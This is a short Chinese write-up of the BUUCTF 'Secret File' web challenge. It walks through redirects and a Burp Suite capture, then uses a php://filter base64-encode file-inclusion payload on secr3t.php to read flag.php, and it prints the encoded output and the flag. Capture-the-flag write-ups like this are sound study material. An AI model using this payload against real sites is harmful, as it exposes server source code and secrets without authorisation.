zoukankan      html  css  js  c++  java

  • 【BUUCTF】WEB SECRET FILE

     发现跳转,修改颜色后发现异常。

    跳转后找到action.php

    但是点进去后是end.php

    burpsuite抓包:

    查看response,发现一个跳转的secr3t.php

    查看secr3t.php源码,发现flag信息:

    flag.php显示内容如下:

    构造php伪协议,payload

    secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

    可得:

    PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7ZTM1OTM0YjItMjU1OS00Y2RjLWIzMDQtYTBhMGU1ZjJlZDNhfSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=

     base64在线解码:

     flag为:

    flag{e35934b2-2559-4cdc-b304-a0a0e5f2ed3a}
  • 相关阅读:
    初识spring
    关于导入别人的web项目,tomcat无法显示的问题
    doPost无法跳转显示信息,只能下载文件查看
    socket网络编程
    log日志文件
    第三方模块安装
    __name__ __doc__ __package__
    格式化
    导入模块
    python正则表达式补充
  • 原文地址:https://www.cnblogs.com/p201721420021/p/15676051.html
Copyright © 2011-2022 走看看